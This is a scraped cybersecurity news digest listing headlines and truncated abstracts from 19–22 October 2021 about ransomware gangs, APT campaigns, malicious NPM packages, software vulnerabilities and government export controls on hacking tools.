Abstract
Almost $7 million worth of Bitcoin in a wallet controlled by DarkSide ransomware operators has been moved in what looks like a money laundering rollercoaster.BleepingComputer
October 22, 2021 – Attack
‘Lone Wolf’ Hacker Group Targeting Afghanistan and India with Commodity RATs Full Text
Abstract
A new malware campaign targeting Afghanistan and India is exploiting a now-patched, 20-year-old flaw affecting Microsoft Office to deploy an array of commodity remote access trojans (RATs) that allow the adversary to gain complete control over the compromised endpoints. Cisco Talos attributed the cyber campaign to a "lone wolf" threat actor operating a Lahore-based fake IT company called Bunse Technologies as a front to carry out the malicious activities, while also having a history of sharing content that's in favor of Pakistan and Taliban dating all the way back to 2016. The attacks work by taking advantage of political and government-themed lure domains that host the malware payloads, with the infection chains leveraging weaponized RTF documents and PowerShell scripts that distribute malware to victims. Specifically, the laced RTF files were found exploiting CVE-2017-11882 to execute a PowerShell command that's responsible for deploying additional malware toThe Hacker News
October 22, 2021 – Criminals
DarkSide ransomware operators move 6.8M worth of Bitcoin after REvil shutdown Full Text
Abstract
Darkside and BlackMatter ransomware operators have moved a large amount of their Bitcoin reserves after the recent shutdown of REvil's infrastructure. The gangs behind the Darkside and BlackMatter ransomware operations have moved 107 BTC ($6.8 million)...Security Affairs
October 22, 2021 – Criminals
Groove ransomware calls on all extortion gangs to attack US interests Full Text
Abstract
The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week.BleepingComputer
October 22, 2021 – Phishing
This monster of a phishing campaign is after your passwords Full Text
Abstract
Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses the ZooToday phishing kit built using pieces of code copied from other hackers' work.ZDNet
October 22, 2021 – Hacker
Hackers Set Up Fake Company to Get IT Experts to Launch Ransomware Attacks Full Text
Abstract
The financially motivated FIN7 cybercrime gang has masqueraded as yet another fictitious cybersecurity company called "Bastion Secure" to recruit unwitting software engineers under the guise of penetration testing in a likely lead-up to a ransomware scheme. "With FIN7's latest fake company, the criminal group leveraged true, publicly available information from various legitimate cybersecurity companies to create a thin veil of legitimacy around Bastion Secure," Recorded Future's Gemini Advisory unit said in a report. "FIN7 is adopting disinformation tactics so that if a potential hire or interested party were to fact check Bastion Secure, then a cursory search on Google would return 'true' information for companies with a similar name or industry to FIN7's Bastion Secure." FIN7 , also known as Carbanak, Carbon Spider, and Anunak, has a track record of striking restaurant, gambling, and hospitality industries in the U.S. to infectThe Hacker News
October 22, 2021 – Criminals
FIN7 cybercrime gang creates fake cybersecurity firm to recruit pentesters for ransomware attacks Full Text
Abstract
FIN7 hacking group created fake cybersecurity companies to hire experts and involve them in ransomware attacks tricking them of conducting a pentest. The FIN7 hacking group is attempting to enter in the ransomware business and is doing it with an interesting...Security Affairs
October 22, 2021 – Malware
Microsoft: WizardUpdate Mac malware adds new evasion tactics Full Text
Abstract
Microsoft says it found new variants of macOS malware known as WizardUpdate (also tracked as UpdateAgent or Vigram), updated to use new evasion and persistence tactics.BleepingComputer
October 22, 2021 – Attack
Swiss exhibitions organizer MCH Group hit by cyberattack Full Text
Abstract
Swiss events organizer and marketing company MCH Group was hit by a malware attack on Wednesday (October 20). The firm says it is working to get systems up and running again.The Daily Swig
October 22, 2021 – Malware
Researchers Discover Microsoft-Signed FiveSys Rootkit in the Wild Full Text
Abstract
A newly identified rootkit has been found with a valid digital signature issued by Microsoft that's used to proxy traffic to internet addresses of interest to the attackers for over a year targeting online gamers in China. Bucharest-headquartered cybersecurity technology company Bitdefender named the malware " FiveSys ," calling out its possible credential theft and in-game-purchase hijacking motives. The Windows maker has since revoked the signature following responsible disclosure. "Digital signatures are a way of establishing trust," Bitdefender researchers said in a white paper, adding "a valid digital signature helps the attacker navigate around the operating system's restrictions on loading third-party modules into the kernel. Once loaded, the rootkit allows its creators to gain virtually unlimited privileges." Rootkits are both evasive and stealthy as they offer threat actors an entrenched foothold onto victims' systems and concealThe Hacker News
October 22, 2021 – Malware
FiveSys, a new digitally-signed rootkit spotted by Bitdefender experts Full Text
Abstract
Bitdefender researchers discovered a new Rootkit named FiveSys that abuses Microsoft-Issued Digital Signature signature to evade detection. FiveSys is a new rootkit discovered by researchers from Bitdefender, it is able to evade detection by abusing...Security Affairs
October 22, 2021 – Breach
Italian celebs’ data exposed in ransomware attack on SIAE Full Text
Abstract
The Italian data protection authority Garante per la Protezione dei Dati Personali (GPDP) has announced an investigation into a data breach of the country's copyright protection agency.BleepingComputer
October 22, 2021 – Criminals
DarkSide Ransomware Gang Moves Bitcoin Reserves After REvil Got Hit by Law Enforcement Action Full Text
Abstract
The operators of the Darkside and BlackMatter ransomware strains have moved a large chunk of their Bitcoin reserves after news broke that REvil was hit by a law enforcement takedown.The Record
October 22, 2021 – Solution
Microsoft Teams adds end-to-end encryption for one-to-one calls Full Text
Abstract
Microsoft has announced the public preview roll-out of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.BleepingComputer
October 22, 2021 – Business
Turkish cybersecurity venture raises $24M to accelerate expansion Full Text
Abstract
This latest round takes the total funding Picus has received to $33 million. The company plans to use the funds to help accelerate its expansion in EMEA and APAC countries.Daily Sabah
October 22, 2021 – Privacy
Microsoft Teams adds end-to-end encryption for one-to-one calls Full Text
Abstract
Microsoft has announced the public preview roll-out of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.BleepingComputer
October 21, 2021 – Ransomware
TA551 Shifts Tactics to Install Sliver Red-Teaming Tool Full Text
Abstract
A new email campaign from the threat group uses the attack-simulation framework in a likely leadup to ransomware deployment.Threatpost
October 21, 2021 – Attack
Gigabyte Allegedly Hit by AvosLocker Ransomware Full Text
Abstract
If AvosLocker stole Gigabyte’s master keys, threat actors could force hardware to download fake drivers or BIOS updates in a supply-chain attack a la SolarWinds.Threatpost
October 21, 2021 – General
Why is Cybersecurity Failing Against Ransomware? Full Text
Abstract
Hardly a week goes by without another major company falling victim to a ransomware attack. Nate Warfield, CTO at Prevailion, discusses the immense challenges in changing that status quo.Threatpost
October 21, 2021 – Attack
Massive campaign uses YouTube to push password-stealing malware Full Text
Abstract
Widespread malware campaigns are creating YouTube videos to distribute password-stealing trojans to unsuspecting viewers.BleepingComputer
October 21, 2021 – Criminals
Cybercriminals Exploit the Discord CDN to Deliver 27 Unique Types of Malware Full Text
Abstract
Discord, a popular VoIP, instant messaging, and digital distribution platform used by 140 million people in 2021, is being abused by cybercriminals to deploy malware files.Risk IQ
October 21, 2021 – Criminals
US, allied nations force REvil ransomware group offline: report Full Text
Abstract
The United States and other nations earlier this week in a joint operation hacked and forced offline the REvil cyber criminal group, which has been linked to several major ransomware attacks this year.The Hill
October 21, 2021 – Education
Before and After a Pen Test: Steps to Get Through It Full Text
Abstract
An effective cybersecurity strategy can be challenging to implement correctly and often involves many layers of security. Part of a robust security strategy involves performing what is known as a penetration test (pen test). The penetration test helps to discover vulnerabilities and weaknesses in your security defenses before the bad guys discover these. They can also help validate remedial efforts and solutions put in place to overcome previously discovered security vulnerabilities. Let's look more closely at the pen test. What is included in a penetration test? How are they performed, and by whom? What steps should be taken after a penetration test? What is a penetration test? 1 — Simulated cyberattack A penetration test is, for all practical purposes, a simulated cyberattack on your business. However, it is carried out by the "good guys." An outside resource often conducts a penetration test, whether a third-party security consulting company or another security entity. SecuritThe Hacker News
October 21, 2021 – Ransomware
Evil Corp rebrands their ransomware, this time is the Macaw Locker Full Text
Abstract
Evil Corp cybercrime gang is using a new ransomware called Macaw Locker to evade US sanctions that prevent victims from paying the ransom. Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from...Security Affairs
October 21, 2021 – General
U.S. Ban on Sales of Cyberattack Tools Is Anemic, Experts Warn Full Text
Abstract
Meanwhile, Zerodium’s quest to buy VPN exploits is problematic, researchers said.Threatpost
October 21, 2021 – Attack
Evil Corp demands $40 million in new Macaw ransomware attacks Full Text
Abstract
Evil Corp has launched a new ransomware called Macaw Locker to evade US sanctions that prevent victims from making ransom payments.BleepingComputer
October 21, 2021 – Business
INE Acquires Pentester Academy to Enhance Comprehensive IT Training Solutions Full Text
Abstract
INE has acquired Pentester Academy to accelerate the creation of more challenging, scenario-based training tools across Cyber Security, Networking, Data Science, Cloud, and DevOps.Globe News Wire
October 21, 2021 – Government
New Senate bill would take steps to protect AI-collected data Full Text
Abstract
A new bipartisan Senate bill introduced Thursday is aiming to secure data collected by artificial intelligence technologies, such as facial recognition technologies, as these types of technologies continue to grow in use.The Hill
October 21, 2021 – Vulnerabilities
Bug in Popular WinRAR Software Could Let Attackers Hack Your Computer Full Text
Abstract
A new security weakness has been disclosed in the WinRAR trialware file archiver utility for Windows that could be abused by a remote attacker to execute arbitrary code on targeted systems, underscoring how vulnerabilities in such software could beсome a gateway for a roster of attacks. Tracked as CVE-2021-35052, the bug impacts the trial version of the software running version 5.70. "This vulnerability allows an attacker to intercept and modify requests sent to the user of the application," Positive Technologies' Igor Sak-Sakovskiy said in a technical write-up. "This can be used to achieve remote code execution (RCE) on a victim's computer." Sak-Sakovskiy noted that investigation into WinRAR began after observing a JavaScript error rendered by MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents, leading to the discovThe Hacker News
October 21, 2021 – Vulnerabilities
A flaw in WinRAR could lead to remote code execution Full Text
Abstract
A vulnerability in the WinRAR is a trialware file archiver utility for Windows could be exploited by a remote attacker to hack a system. Positive Technologies researcher Igor Sak-Sakovskiy discovered a remote code execution vulnerability, tracked...Security Affairs
October 21, 2021 – Breach
Ransomware Sinks Teeth into Candy-Corn Maker Ahead of Halloween Full Text
Abstract
Chicago-based Ferrara acknowledged an Oct. 9 attack that encrypted some systems and disrupted production.Threatpost
October 21, 2021 – General
Microsoft now defends nonprofits against nation-state attacks Full Text
Abstract
Microsoft announced today a new security program for nonprofits to provide them with protection against nation-state attacks that have increasingly targeting them in recent years.BleepingComputer
October 21, 2021 – Vulnerabilities
Historic scientific notation bug foils WAF defenses Full Text
Abstract
Security researchers have discovered that a historic vulnerability affecting both MySQL and MariaDB databases caused serious flaws for security technologies from Amazon Web Services.The Daily Swig
October 21, 2021 – Hacker
Hacking group tied to Colonial Pipeline attack continuing to recruit tech talent Full Text
Abstract
A hacking group linked to the ransomware attack on Colonial Pipeline earlier this year is posing as a fake company to recruit individuals to help carry out further attacks, according to a report published Thursday.The Hill
October 21, 2021 – Solution
Product Overview: Cynet SaaS Security Posture Management (SSPM) Full Text
Abstract
Software-as-a-service (SaaS) applications have gone from novelty to business necessity in a few short years, and its positive impact on organizations is clear. It's safe to say that most industries today run on SaaS applications, which is undoubtedly positive, but it does introduce some critical new challenges to organizations. As SaaS application use expands, as well as the number of touchpoints they create, the attack surface also becomes significantly larger. As an answer to this emerging challenge, XDR provider Cynet has added a new SaaS Security Posture Management (SSPM) tool to its existing platform ( you can learn more here ). Regardless of the size of an organization or its security team, managing the security policy and posture of dozens to hundreds of SaaS applications is a complex task, and one that requires the right tools to expedite and optimize. Using SSPM can centralize many of the management and logistics requirements and offer a more unified way to establish securThe Hacker News
October 21, 2021 – Policy and Law
Administrators of bulletproof hosting sentenced to prison in the US Full Text
Abstract
The United States Department of Justice sentenced two individuals that were providing bulletproof hosting to various malware operations. The United States Department of Justice sentenced to prison two individuals involved in providing bulletproof...Security Affairs
October 21, 2021 – Criminals
Hacking gang creates fake firm to hire pentesters for ransomware attacks Full Text
Abstract
The FIN7 hacking group is attempting to join the highly profitable ransomware space by creating fake cybersecurity companies that conduct network attacks under the guise of pentesting.BleepingComputer
October 21, 2021 – Business
Plurilock to Acquire Assets of CloudCodes Software, Award Winning Cloud Security Provider Full Text
Abstract
Plurilock has entered into definitive agreements dated October 21, 2021, to acquire certain assets of CloudCodes Software Private Limited, a cloud access security broker based in India.Yahoo! Finance
October 21, 2021 – Cryptocurrency
Malicious NPM Packages Caught Running Cryptominer On Windows, Linux, macOS Devices Full Text
Abstract
Three JavaScript libraries uploaded to the official NPM package repository have been unmasked as crypto-mining malware, once again demonstrating how open-source software package repositories are becoming a lucrative target for executing an array of attacks on Windows, macOS, and Linux systems. The malicious packages in question — named okhsa , klow , and klown — were published by the same developer and falsely claimed to be JavaScript-based user-agent string parsers designed to extract hardware specifics from the " User-Agent " HTTP header. But unbeknownst to the victims who imported them, the author hid cryptocurrency mining malware inside the libraries. The bad actor's NPM account has since been deactivated, and all the three libraries, each of which were downloaded 112, 4, and 65 times respectively, have been removed from the repository as of October 15, 2021. Attacks involving the three libraries worked by detecting the current operating system, before proceeThe Hacker News
October 21, 2021 – Government
US Bureau of Industry and Security bans export of hacking tools to authoritarian regimes Full Text
Abstract
The Commerce Department's Bureau of Industry and Security (BIS) would ban U.S. firms from selling hacking tools to authoritarian regimes. The Commerce Department's Bureau of Industry and Security (BIS) would introduce a new export control rule aimed...Security Affairs
October 21, 2021 – Vulnerabilities
Google launches Android Enterprise bug bounty program Full Text
Abstract
Google has announced the launch of its first vulnerability rewards program for Android Enterprise with bounties of up to $250,000.BleepingComputer
October 21, 2021 – Policy and Law
US judge sentences duo for roles in running bulletproof hosting service Full Text
Abstract
The duo were accused of providing online hosting services that are known as bulletproof -- a popular option for cybercriminals who need a host that will turn a blind eye to criminal activity.ZDNet
October 21, 2021 – Government
U.S. Government Bans Sale of Hacking Tools to Authoritarian Regimes Full Text
Abstract
The U.S. Commerce Department on Wednesday announced new rules barring the sales of hacking software and equipment to authoritarian regimes and potentially facilitate human rights abuse for national security (NS) and anti-terrorism (AT) reasons. The mandate , which is set to go into effect in 90 days, will forbid the export, reexport and transfer of "cybersecurity items" to countries of "national security or weapons of mass destruction concern" such as China and Russia without a license from the department's Bureau of Industry and Security (BIS). "The United States Government opposes the misuse of technology to abuse human rights or conduct other malicious cyber activities, and these new rules will help ensure that U.S. companies are not fueling authoritarian practices," BIS said in a press release. The rule does not cover "intrusion software" itself, but rather the following — Systems, equipment, and components specially designed orThe Hacker News
October 21, 2021 – General
Top 5 Attack Vectors to Look Out For in 2022 Full Text
Abstract
Threat actors are continually looking for better ways to target organizations, here are the top five attack vectors to look out for in 2022. Malicious actors are continually looking for better ways to carry out successful cyber attacks. Whether motivated...Security Affairs
October 21, 2021 – Criminals
Cybercrime matures as hackers are forced to work smarter Full Text
Abstract
An analysis of 500 hacking incidents across a wide range of industries has revealed trends that characterize a maturity in the way hacking groups operate today.BleepingComputer
October 21, 2021 – Cryptocurrency
Cryptomining Malware Found Hidden Inside Three Libraries on Official NPM Package Repository Full Text
Abstract
The names of the three npm packages were klow, klown, and okhsa. The packages were live only for a day, on October 15. The final payloads (cryptominers) could be run on Windows or Linux platforms.The Record
October 21, 2021 – Hacker
Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts Full Text
Abstract
Since at least late 2019, a network of hackers-for-hire have been hijacking the channels of YouTube creators, luring them with bogus collaboration opportunities to broadcast cryptocurrency scams or sell the accounts to the highest bidder. That's according to a new report published by Google's Threat Analysis Group (TAG), which said it disrupted financially motivated phishing campaigns targeting the video platform with cookie theft malware. The actors behind the infiltration have been attributed to a group of hackers recruited in a Russian-speaking forum. "Cookie Theft, also known as 'pass-the-cookie attack,' is a session hijacking technique that enables access to user accounts with session cookies stored in the browser," TAG's Ashley Shen said . "While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifThe Hacker News
October 21, 2021 – Malware
RAT malware spreading in Korea through webhards and torrents Full Text
Abstract
An ongoing malware distribution campaign targeting South Korea is disguising RATs (remote access trojans) as an adult game shared via webhards and torrents.BleepingComputer
October 21, 2021 – General
Siloed security data hamper the ability to achieve collective defense Full Text
Abstract
In a new Cyware study, conducted by Forrester, 64% of respondents noted that sharing cyber threat intelligence between their organizations’ SOC, incident response, and threat intel teams is limited.Help Net Security
October 21, 2021 – Policy and Law
Nine arrested for impersonating bank clerks to steal from the elderly Full Text
Abstract
The Dutch Police have arrested nine people for targeting and stealing money from the elderly by impersonating bank employees.BleepingComputer
October 21, 2021 – Criminals
Bulletproof hosting admins sentenced for helping cybercrime gangs Full Text
Abstract
Two Eastern European men were sentenced to prison on Racketeer Influenced Corrupt Organization (RICO) charges for bulletproof hosting services used by multiple cybercrime operations to target US organizations.BleepingComputer
October 20, 2021 – Hacker
Google Crushes YouTube Cookie-Stealing Channel Hijackers Full Text
Abstract
Google has caught and brushed off a bunch of cookie-stealing YouTube channel hijackers who were running cryptocurrency scams on, or auctioning off, ripped-off channels.Threatpost
October 20, 2021 – APT
Geriatric Microsoft Bug Exploited by APT Using Commodity RATs Full Text
Abstract
Disguised as an IT firm, the APT is hitting targets in Afghanistan & India, exploiting a 20-year-old+ Microsoft Office bug that’s as potent as it is ancient.Threatpost
October 20, 2021 – Criminals
Two Eastern Europeans Sentenced for Providing Bulletproof Hosting to Cyber Criminals Full Text
Abstract
Two Eastern European nationals have been sentenced in the U.S. for offering "bulletproof hosting" services to cybercriminals, who used the technical infrastructure to distribute malware and attack financial institutions across the country between 2009 to 2015. Pavel Stassi, 30, of Estonia, and Aleksandr Shorodumov, 33, of Lithuania, have been each sentenced to 24 months and 48 months in prison, respectively, for their roles in the scheme. The development comes months after Stassi and Shorodumov, along with Aleksandr Grichishkin and Andrei Skvortsov of Russia, pleaded guilty to Racketeer Influenced Corrupt Organization (RICO) charges earlier this May. The U.S. Justice Department (DoJ) said the other two co-defendants, Grichishkin and Skvortsov, are pending sentencing and face a maximum penalty of 20 years in prison. Court documents showed that both the individuals worked as administrators for an unnamed bulletproof hosting service provider that rented out IP addresses,The Hacker News
October 20, 2021 – Government
US govt to ban export of hacking tools to authoritarian regimes Full Text
Abstract
The Commerce Department's Bureau of Industry and Security (BIS) today announced export controls for software and hardware tools that could be used for malicious hacking activities.BleepingComputer
October 20, 2021 – Vulnerabilities
Oracle’s October 2021 CPU Includes 419 Security Patches Full Text
Abstract
Oracle on Tuesday announced the release of its latest quarterly Critical Patch Update (CPU), which includes a total of 419 security patches for vulnerabilities across the company’s portfolio.Security Week
October 20, 2021 – Government
House approves bill to strengthen IT supply chain following SolarWinds hack Full Text
Abstract
The House on Wednesday approved legislation to strengthen software and information technology supply chains at the Department of Homeland Security (DHS) and to help protect against attacks similar to last year’s SolarWinds hack.The Hill
October 20, 2021 – Hacker
Researchers Break Intel SGX With New ‘SmashEx’ CPU Attack Technique Full Text
Abstract
A newly disclosed vulnerability affecting Intel processors could be abused by an adversary to gain access to sensitive information stored within enclaves and even run arbitrary code on vulnerable systems. The vulnerability ( CVE-2021-0186 , CVSS score: 8.2) was discovered by a group of academics from ETH Zurich, the National University of Singapore, and the Chinese National University of Defense Technology in early May 2021, who used it to stage a confidential data disclosure attack called " SmashEx " that can corrupt private data housed in the enclave and break its integrity. Introduced with Intel's Skylake processors, SGX (short for Software Guard eXtensions) allows developers to run selected application modules in a completely isolated secure compartment of memory, called an enclave or a Trusted Execution Environment (TEE), which is designed to be protected from processes running at higher privilege levels like the operating system. SGX ensures that data is secureThe Hacker News
October 20, 2021 – Breach
YouTube creators’ accounts hijacked with cookie-stealing malware Full Text
Abstract
A Cookie Theft malware was employed in phishing attacks against YouTube creators, Google's Threat Analysis Group (TAG) warns. Financially motivated threat actors are using Cookie Theft malware in phishing attacks against YouTube creators since late...Security Affairs
October 20, 2021 – Phishing
Employees Make Best Frontline Phishing Defense Full Text
Abstract
October is Cybersecurity Awareness Month. Make empowering workers to detect and thwart inbox attacks a priority with Trend Micro Phish Insight.Threatpost
October 20, 2021 – Denial Of Service
DDoS attacks against Russian firms have almost tripled in 2021 Full Text
Abstract
A report analyzing data from the start of the year concludes that distributed denial-of-service (DDoS) attacks on Russian companies have increased 2.5 times compared to the same period last year.BleepingComputer
October 20, 2021 – Criminals
Cybercriminals Use Interactsh Tool for Vulnerability Validation Full Text
Abstract
Unit 42 discovered hackers exploiting an open-source service called Interactsh; the tool generates desired domain names to help users test whether an exploit is successful. The tool allows anyone to generate specific URLs for testing on HTTP attempts and DNS queries, which help them test whet ... Read MoreCyware Alerts - Hacker News
October 20, 2021 – Government
House passes bills to secure telecommunications infrastructure Full Text
Abstract
The House on Wednesday approved multiple bipartisan bills aimed at securing U.S. telecommunications systems against foreign interference, in particular against threats from China.The Hill
October 20, 2021 – General
OWASP’s 2021 List Shuffle: A New Battle Plan and Primary Foe Full Text
Abstract
Code injection attacks, the infamous king of vulnerabilities, have lost the top spot to broken access control as the worst of the worst, and developers need to take notice. In this increasingly chaotic world, there have always been a few constants that people could reliably count on: The sun will rise in the morning and set again at night, Mario will always be cooler than Sonic the Hedgehog, and code injection attacks will always occupy the top spot on the Open Web Application Security Project (OWASP) list of the top ten most common and dangerous vulnerabilities that attackers are actively exploiting. Well, the sun will rise tomorrow, and Mario still has "one-up" on Sonic, but code injection attacks have fallen out of the number one spot on the infamous OWASP list, refreshed in 2021. One of the oldest forms of attacks, code injection vulnerabilities have been around almost as long as computer networking. The blanket vulnerability is responsible for a wide range of attacks, incluThe Hacker News
October 20, 2021 – Botnet
PurpleFox botnet variant uses WebSockets for more secure C2 communication Full Text
Abstract
Researchers warn of a new evolution of the PurpleFox botnet, operators included exploits and leverage WebSockets for C2 communication. Researchers from TrendMicro have documented a recent evolution of the PurpleFox botnet, the experts discovered...Security Affairs
October 20, 2021 – Vulnerabilities
Political-themed actor using old MS Office flaw to drop multiple RATs Full Text
Abstract
A novel threat actor with unclear motives has been discovered running a crimeware campaign which delivers multiple Windows and Android RATs (remote access tools) through the exploitation of CVE-2017-11882.BleepingComputer
October 20, 2021 – Criminals
REvil Disappears Once Again Full Text
Abstract
The Tor payment portal and data leak site of REvil was sent to oblivion after an unknown hacker using the same private keys hijacked the group’s domains. This is the second time that REvil has shut down its operations. Still, organizations should stay protected from such threats by keeping a reliab ... Read MoreCyware Alerts - Hacker News
October 20, 2021 – Government
Senate Republicans raise concerns about TSA cyber directives for rail, aviation Full Text
Abstract
Republican leaders and members of the Senate Commerce Committee on Wednesday raised concerns about the timeline and lack of public input involved in recently announced cybersecurity directives for the rail and aviation sectors.The Hill
October 20, 2021 – Breach
LightBasin Hackers Breach at Least 13 Telecom Service Providers Since 2019 Full Text
Abstract
A highly sophisticated adversary named LightBasin has been identified as behind a string of attacks targeting the telecom sector with the goal of collecting "highly specific information" from mobile communication infrastructure, such as subscriber information and call metadata. "The nature of the data targeted by the actor aligns with information likely to be of significant interest to signals intelligence organizations," researchers from cybersecurity firm CrowdStrike said in an analysis published Tuesday. Known to be active as far back as 2016, LightBasin (aka UNC1945) is believed to have compromised 13 telecommunication companies across the world since 2019 by leveraging custom tools and their extensive knowledge of telecommunications protocols for scything through organizations' defenses. The identities of the targeted entities were not disclosed, nor did the findings link the cluster's activity to a specific country. Indeed, a recent incident inThe Hacker News
October 20, 2021 – Breach
Acer suffers a second data breach in a week Full Text
Abstract
Tech giant Acer was hacked again in a few days, after the compromise of the servers in India, threat actors also breached some of its systems in Taiwan. Tech giant Acer was hacked twice in a week, the same threat actor (Desorden) initially breached...Security Affairs
October 20, 2021 – Attack
Google: YouTubers’ accounts hijacked with cookie-stealing malware Full Text
Abstract
Google says YouTube creators have been targeted with password-stealing malware in phishing attacks coordinated by financially motivated threat actors since at least late 2019.BleepingComputer
October 20, 2021 – Breach
Centre for Computing History apologises for data breach Full Text
Abstract
The Centre for Computing History (CCH) in Cambridge, England, has apologised for an "embarrassing" breach in its online customer datafile, though thankfully no payment card information was exposed.The Register
October 20, 2021 – Hacker
Major Russian hacking group linked to ransomware attack on Sinclair: report Full Text
Abstract
A well-known Russian hacking group previously sanctioned by the United States is behind the crippling ransomware attack on Sinclair Broadcast Group that is continuing to impact news stations across the country, according to a new report.The Hill
October 20, 2021 – Vulnerabilities
Microsoft Warns of New Security Flaw Affecting Surface Pro 3 Devices Full Text
Abstract
Microsoft has published a new advisory warning of a security bypass vulnerability affecting Surface Pro 3 convertible laptops that could be exploited by an adversary to introduce malicious devices within enterprise networks and defeat the device attestation mechanism. Tracked as CVE-2021-42299 (CVSS score: 5.6), the issue has been codenamed " TPM Carte Blanche " by Google software engineer Chris Fenner, who is credited with discovering and reporting the attack technique. As of writing, other Surface devices, including the Surface Pro 4 and Surface Book, have been deemed unaffected, although other non-Microsoft machines using a similar BIOS may be vulnerable. "Devices use Platform Configuration Registers ( PCRs ) to record information about device and software configuration to ensure that the boot process is secure," the Windows maker noted in a bulletin. "Windows uses these PCR measurements to determine device health. A vulnerable device can masquerade asThe Hacker News
October 20, 2021 – Hacker
China-linked LightBasin group accessed calling records from telcos worldwide Full Text
Abstract
China-linked cyberespionage group LightBasin hacked mobile telephone networks around the world and used specialized tools to access calling records. A China-linked hacking group, tracked as LightBasin (aka UNC1945), hacked mobile telephone networks...Security Affairs
October 20, 2021 – Attack
New Gummy Browsers attack lets hackers spoof tracking profiles Full Text
Abstract
University researchers in the US have developed a new fingerprint capturing and browser spoofing attack called Gummy Browsers. They warn how easy the attack is to carry out and the severe implications it can have.BleepingComputer
October 20, 2021 – APT
Lyceum Group Updates its Arsenal With New Tricks and Tools Full Text
Abstract
The lesser-known Lyceum APT seems to be on a mission to gain a foothold with its re-appearance. The gang has been associated with an attack campaign launched against entities in Tunisia. Similarities between Lyceum and the infamous DNSpionage campaign, a cluster of activity linked to the ... Read MoreCyware Alerts - Hacker News
October 20, 2021 – Government
Commerce Department cracks down on sale of hacking products to foreign governments Full Text
Abstract
The Commerce Department on Wednesday took steps to crack down on the sale of certain hacking products used by foreign governments and other groups to surveil and repress individuals.The Hill
October 20, 2021 – Vulnerabilities
Zerodium is looking for zero-day exploits in ExpressVPN, NordVPN, and Surfshark Windows VPN clients Full Text
Abstract
Zero-day exploit broker Zerodium announced it is looking for zero-day vulnerabilities in the Windows clients of ExpressVPN, NordVPN, and Surfshark. Zerodium is looking to pay for zero-day exploits for vulnerabilities in the Windows clients of three...Security Affairs
October 20, 2021 – Insider Threat
Microsoft 365 will get enhanced insider risk management tools Full Text
Abstract
Microsoft is updating Microsoft 365 to allow admins to better manage insider security threats in their environments with improvements to risky activity detection and visibility.BleepingComputer
October 20, 2021 – Hacker
Hackers are Disguising Malicious JavaScript Code Using Packers to Bypass Signature-based Detection Systems Full Text
Abstract
Packers work by compressing or encrypting code to make that code unreadable and non-debuggable — resulting in 'obfuscated' code that is difficult for antivirus to detect.ZDNet
October 20, 2021 – Attack
Google says Russian-speaking hackers hijacked YouTube channels for cryptocurrency scam Full Text
Abstract
Google on Wednesday reported it has tracked and disrupted an email phishing campaign tied to Russian-speaking hackers that has targeted YouTube users since 2019 as part of a cryptocurrency scam effort.The Hill
October 20, 2021 – Botnet
New PurpleFox botnet variant uses WebSockets for C2 communication Full Text
Abstract
The PurpleFox botnet has refreshed its arsenal with new vulnerability exploits and dropped payloads, now also leveraging WebSockets for C2 bidirectional communication.BleepingComputer
October 20, 2021 – Ransomware
Yanluowang: New Player in the Ransomware Scene Full Text
Abstract
Symantec uncovered a new strain of ransomware, dubbed Yanluowang, targeting virtual machines in enterprises. The attackers behind the ransomware have used the genuine AdFind command line Active Directory query tool. Hackers further warned not to approach law enforcement for help.Cyware Alerts - Hacker News
October 20, 2021 – Attack
New Stealth Phishing Campaign Targets Financial Organizations Full Text
Abstract
Morphisec Labs unearthed a new MirrorBlast campaign aimed at financial services across Canada, the U.S., Europe, Hong Kong, and others. The campaign has an uncanny resemblance to the Russia-based TA505 group. Organizations must protect themselves with adequate protection solutions, such as anti-phi ... Read MoreCyware Alerts - Hacker News
October 20, 2021 – Vulnerabilities
PoC Exploit that Bypass macOS Security is Out and Being Exploited Full Text
Abstract
Experts found a PoC exploit for a macOS Gatekeeper bypass flaw that was being exploited in the wild. Tracked as CVE-2021-1810, t he vulnerability exploits the way in which Archive Utility handles file paths in MacOS systems. If any malware bypass this, it could be a massive compromise for a targete ... Read MoreCyware Alerts - Hacker News
October 19, 2021 – APT
Fresh APT Harvester Reaps Telco, Government Data Full Text
Abstract
The group is likely nation-state-backed and is mounting an ongoing spy campaign using custom malware and stealthy tactics.Threatpost
October 19, 2021– APT
Lyceum APT Returns, This Time Targeting Tunisian Firms Full Text
Abstract
The APT, which targets Middle-Eastern energy firms & telecoms, has been relatively quiet since its exposure but not entirely silent. It’s kept up attacks through 2021 and is working on retooling its arsenal yet again.Threatpost
October 19, 2021 – Criminals
Feds Warn BlackMatter Ransomware Gang is Poised to Strike Full Text
Abstract
An advisory by the CISA, FBI and NSA reveals hallmark tactics of and shares defense tips against the cybercriminal group that’s picked up where its predecessor DarkSide left off.Threatpost
October 19, 2021 – Vulnerabilities
Zerodium wants zero-day exploits for Windows VPN clients Full Text
Abstract
In a short tweet today, exploit broker Zerodium said that it is looking to acquire zero-day exploits for vulnerabilities in three popular virtual private network (VPN) service providers on the market.BleepingComputer
October 19, 2021 – Vulnerabilities
PurpleFox Adds New Vulnerability Exploit, Rootkit Capabilities, and .NET Backdoor Full Text
Abstract
The new backdoor leverages WebSockets to communicate with its command-and-control (C&C) servers, resulting in a more robust and secure means of communication compared to regular HTTP traffic.Trend Micro
October 19, 2021 – Hacker
Potential Chinese hackers targeting telecommunications companies Full Text
Abstract
Hackers potentially linked to China are continuously targeting the telecommunications sector, a report released Tuesday by cybersecurity company CrowdStrike found.The Hill
October 19, 2021 – Vulnerabilities
Squirrel Engine Bug Could Let Attackers Hack Games and Cloud Services Full Text
Abstract
